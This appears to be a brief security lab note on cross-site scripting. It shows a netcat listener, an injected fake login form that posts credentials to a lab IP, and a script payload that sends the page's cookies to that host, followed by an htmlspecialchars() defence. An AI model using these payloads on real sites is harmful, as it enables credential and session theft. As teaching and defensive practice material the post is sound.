← Back to home
XSS Cross-Site Scripting Netcat Cookies PHP

XSS: Cookie Theft & Fake Forms

Jan 1, 2022

Practice on Cross-Site Scripting (XSS) attacks: stealing credentials via Netcat, session cookie theft, and using htmlspecialchars() as a defense.

1. Credential Theft via XSS + Netcat

nc -lvp 1337
<form action="http://10.0.2.15:1337">
  <input type="text" name="username">
  <input type="password" name="password">
  <input type="submit" value="Login">
</form>

2. Cookie Theft

<script>img=new Image();img.src="http://10.0.2.15:800/a.php?"+document.cookie;</script>

3. Defense: htmlspecialchars()

$input = htmlspecialchars($_POST['data'], ENT_QUOTES, 'UTF-8');